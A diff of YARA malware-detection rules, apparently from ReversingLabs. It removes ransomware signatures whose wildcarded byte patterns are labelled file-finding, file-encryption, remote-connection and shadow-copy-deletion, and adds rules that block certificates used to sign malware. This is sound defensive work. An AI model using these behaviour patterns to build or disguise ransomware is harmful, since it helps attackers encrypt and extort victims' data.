-            ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00
-            8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33
-            C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
-            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0
-            55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 8B 00 8B 90 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45
-            ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C3 E9 ?? ?? ?? ?? EB ?? 8B E5 5D C3
-        }
-		$find_files = {
-            E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ??
-            84 C0 0F 85 ?? ?? ?? ?? 33 C0 89 43 ?? 8B 43 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 7C ?? 46
-            33 FF 8B 43 ?? C7 04 B8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8B
-            F0 85 F6 7C ?? 46 33 FF 8B 43 ?? 8B 40 ?? 8B 14 B8 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B 43 ?? 8B 53 ?? 89 14 B8 47 4E 75
-            ?? 8B 73 ?? 4E 85 F6 7C ?? 46 33 FF 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 04 BF 8B 53 ??
-            8D 04 C2 89 43 ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? 8B 10 8B 45 ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B
-            45 ?? 33 D2 E8 ?? ?? ?? ?? 47 4E 75 ?? 8B 43 ?? 8B 40 ?? 80 78 ?? ?? 0F 84 ?? ?? ??
-            ?? 80 7B ?? ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? BA ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C3
-            E8 ?? ?? ?? ?? 80 7B ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 50 E8 ?? ?? ?? ?? 85
-            C0 0F 85 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ??
-            ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Amma" and ( pe.signatures [ i ] . serial == "00:cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" or pe.signatures [ i ] . serial == "cb:d3:7c:0a:65:19:13:ee:25:a6:86:0d:7d:5c:cd:f2" ) and 1431734400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_5Fe0Ad6B03C57Ab67A352159004Ca3Db : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d1cf11fc-eb30-54fc-9e34-91ad0c67e694"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13150-L13166"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "6f2489421f2effa2089b744f7e137818935fe2339d9216a42686012c51da677b"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and $encrypt_files_1 and $encrypt_files_2 and $remote_connection_1 and $remote_connection_2 and $remote_connection_3
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SpectorSoft Corp." and pe.signatures [ i ] . serial == "5f:e0:ad:6b:03:c5:7a:b6:7a:35:21:59:00:4c:a3:db" and 1402272000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Awesomescott : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_642Ad8E5Ef8B3Ac767F0D5C1A999Bdaa : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects AwesomeScott ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "36d3b801-dbdb-585a-ac80-1827a6749c87"
-		date = "2020-09-16"
-		modified = "2020-09-16"
+		id = "d29e2342-2d38-5939-aa3f-4506fb36c74a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.AwesomeScott.yara#L1-L101"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13168-L13184"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "ed8096a4abbd015f79f4ec7239cd4070194ad70fa03da6714e499a41f9fb9423"
+		logic_hash = "d42d40ca381b99b68a3384cecf585aab2acca66d4e13503d337b1605d587d0b5"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "AwesomeScott"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 8B C4 48 89 58 ?? 48 89 68 ?? 48 89 70 ?? 57 41 54 41 55 41 56 41 57 48 83 EC ??
-            45 33 FF 4C 8B F2 49 8B D8 4C 89 78 ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 4C
-            89 78 ?? 4C 89 78 ?? 4C 89 78 ?? 4C 89 78 ?? B8 ?? ?? ?? ?? 48 8B F1 45 33 C9 44 8B
-            C0 8B D0 49 8B CE 45 32 ED 48 83 CD ?? 49 8B FF FF 15 ?? ?? ?? ?? 4C 8B E0 48 3B C5
-            75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ??
-            ?? ?? E9 ?? ?? ?? ?? 45 33 C9 4C 89 7C 24 ?? 48 8B CB 41 8D 51 ?? 45 8D 41 ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B E8 48 83 F8 ?? 75
-            ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 33 D2 44 8B CB
-      }
-		$encrypt_files_p2 = {
-            44 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ??
-            4C 8D 05 ?? ?? ?? ?? 48 8D 4C 24 ?? 44 8B CB 33 D2 C7 44 24 ?? ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 4C
-            24 ?? 48 8D 44 24 ?? 45 33 C9 45 33 C0 BA ?? ?? ?? ?? 48 89 44 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8D 15 ?? ?? ?? ?? 44 8B C0 45 33 C9 FF 15
-            ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 4C 8B
-            44 24 ?? 48 8B 4C 24 ?? 48 8D 44 24 ?? 41 B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? E9 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 41 B8 ?? ?? ?? ?? 48 8D 15
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 32 DB 90 4C 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? 48 8B D7 49 8B
-            CC 4C 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 81 7C 24 ?? ?? ?? ?? ??
-            48 8B 4C 24 ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 0F B6 DB 0F 42 D8 48 8D 44 24
-            ?? 45 33 C9 48 89 44 24 ?? 44 0F B6 C3 33 D2 48 89 7C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-      }
-		$encrypt_files_p3 = {
-            74 ?? 44 8B 44 24 ?? 4C 8D 4C 24 ?? 48 8B D7 48 8B CD 4C 89 7C 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 74 ?? 84 DB 0F 84 ?? ?? ?? ?? 41 B5 ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 44 8B C0 48 8B CE E8 ?? ?? ?? ?? 4D 85 E4 74 ?? 49 8B CC FF 15 ?? ??
-            ?? ?? 48 85 ED 74 ?? 48 8B CD FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? 48 8B CF E8 ?? ?? ??
-            ?? 48 8B 4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B
-            D8 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C
-            8D 05 ?? ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 15 ?? ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 4C 89 7C 24 ?? 48 8B
-            4C 24 ?? 48 85 C9 74 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 8B D8 E8 ??
-            ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 48 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 8D 05 ??
-            ?? ?? ?? 48 8D 48 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 83 C0 ?? 44 8B C3 48 8B C8 E8 ?? ?? ?? ?? 48 8B 4C 24
-        }
-		$find_files = {
-            E8 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 33 F6 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ??
-            ?? 00 00 E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15
-            ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83
-            F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? 41
-            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F6 44 24 ?? ?? 74 ?? 4C 8D 44
-            24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D
-            15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ??
-            ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ??
-            ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48
-            8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C
-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 8B 44 24 ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? 33 D2 41 B8 ?? ?? ?? ?? 66 89 B4 24 ?? ?? 00 00 E8 ?? ?? ?? ??
-            4C 8D 44 24 ?? 48 8D 8C 24 ?? ?? ?? ?? 48 8B D7 FF 15 ?? ?? ?? ?? 4C 8D 84 24 ?? ??
-            ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 39 74 24 ?? 76
-            ?? 4C 8D 0D ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 8D 4C 24
-            ?? E8 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            48 8B CB FF 15
-      }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Itgms Ltd" and pe.signatures [ i ] . serial == "64:2a:d8:e5:ef:8b:3a:c7:67:f0:d5:c1:a9:99:bd:aa" and 1447804800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_5333D3079D8Afda715703775E1389991 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4db299c6-5be9-5900-a944-07a0a41920a4"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13186-L13202"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "98bd9d35c4e196a11943826115ab495833f7ef1d95f9736cc24255d6dd4fd21c"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trambambon LLC" and pe.signatures [ i ] . serial == "53:33:d3:07:9d:8a:fd:a7:15:70:37:75:e1:38:99:91" and 1239148800 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_139A7Ee1F1A7735C151089755Df5D373 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DenizKizi ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "eaab67a1-ed7a-58f3-afb3-3637c3b72020"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13204-L13220"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc"
+		logic_hash = "86072fef7d1488dc257c3ca8fbb99620ec06f8ecb671b4e20d09d0ce6cc8601d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DenizKizi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ??
-            ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
-            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
-            ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ??
-            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
-            45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ??
-            ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50
-            8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
-            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
-        }
-		$delete_shadow_copies = {
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
-            64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
